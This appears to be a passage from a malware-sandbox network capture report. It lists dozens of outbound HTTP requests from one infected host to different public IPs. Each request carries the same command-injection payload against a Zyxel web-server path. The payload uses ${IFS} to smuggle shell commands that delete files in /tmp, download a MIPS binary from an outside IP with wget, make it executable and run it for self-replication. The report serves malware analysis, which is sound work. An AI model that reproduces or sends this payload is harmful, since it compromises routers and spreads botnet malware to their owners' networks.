                                                  Jan 19, 2024 18:24:06.268241882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7079192.168.2.1336988204.1.73.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268279076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7080192.168.2.1355212128.119.222.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268325090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7081192.168.2.134099846.30.66.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268363953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7082192.168.2.135650297.15.248.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268385887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7083192.168.2.1336486194.46.31.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268428087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7084192.168.2.1351930213.103.240.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268456936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7085192.168.2.1338372141.135.119.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268501043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7086192.168.2.1342560202.93.58.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268522978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7087192.168.2.1350374191.93.138.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268558979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7088192.168.2.135728478.98.205.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268627882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7089192.168.2.1357880202.2.162.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268663883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7090192.168.2.133383090.77.105.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268699884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7091192.168.2.1341068102.169.27.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268740892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7092192.168.2.135882424.203.225.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268785954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7093192.168.2.1341538187.181.48.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268811941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7094192.168.2.1338564200.40.174.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268857956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7095192.168.2.1351902202.186.185.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268898964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7096192.168.2.1347444161.79.218.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.268948078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7097192.168.2.1338742174.63.101.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269006014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7098192.168.2.135687213.129.117.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269037962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7099192.168.2.133383472.33.242.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269078016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7100192.168.2.133865669.38.206.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269139051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7101192.168.2.1345626176.1.119.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269146919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7102192.168.2.1354980184.182.250.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269213915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7103192.168.2.134176851.49.150.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269237995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7104192.168.2.1359486221.239.205.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269285917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7105192.168.2.1353656203.185.176.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269339085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7106192.168.2.13355381.49.148.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269366026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7107192.168.2.1348724108.67.114.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269413948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7108192.168.2.1340508217.161.28.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269460917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7109192.168.2.1343646213.133.196.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269499063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7110192.168.2.135950842.222.42.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269545078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7111192.168.2.1337040187.238.199.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269593000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7112192.168.2.135745292.236.77.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269646883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7113192.168.2.1355660133.250.76.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269673109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7114192.168.2.1334910123.195.4.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269716978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7115192.168.2.135270078.34.234.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269752026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7116192.168.2.1339858219.233.49.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269803047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7117192.168.2.1350232216.174.25.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269835949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7118192.168.2.1335852208.59.30.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269881010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7119192.168.2.1354412136.90.167.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269921064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7120192.168.2.1338918114.192.221.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.269961119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7121192.168.2.134244495.144.49.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.270006895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7122192.168.2.134484490.252.184.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.270047903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7123192.168.2.1338866152.132.218.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.270092964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7124192.168.2.1359544133.77.130.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.270139933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7125192.168.2.1359620216.65.227.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.270185947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7126192.168.2.134031027.124.245.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.270224094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7127192.168.2.1351714104.244.223.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.270275116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7128192.168.2.1340624212.207.213.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.270304918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7129192.168.2.1338064217.95.145.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.271394014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7130192.168.2.1360268145.102.189.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.274013042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7131192.168.2.1352150159.204.162.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.274079084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7132192.168.2.1358530172.72.30.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.274106026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7133192.168.2.1339302203.169.89.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.274159908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7134192.168.2.1352370163.86.185.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.274188995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7135192.168.2.134511668.182.30.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:06.274240971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7136192.168.2.135329649.137.56.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282439947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7137192.168.2.1351010141.127.115.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282473087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7138192.168.2.135388296.65.135.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282502890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7139192.168.2.1340474221.197.57.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282529116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7140192.168.2.1345502208.231.6.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:07.282566071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  7141192.168.2.1352306220.252.234.71443
                                                  TimestampBytes transferredDirectionData
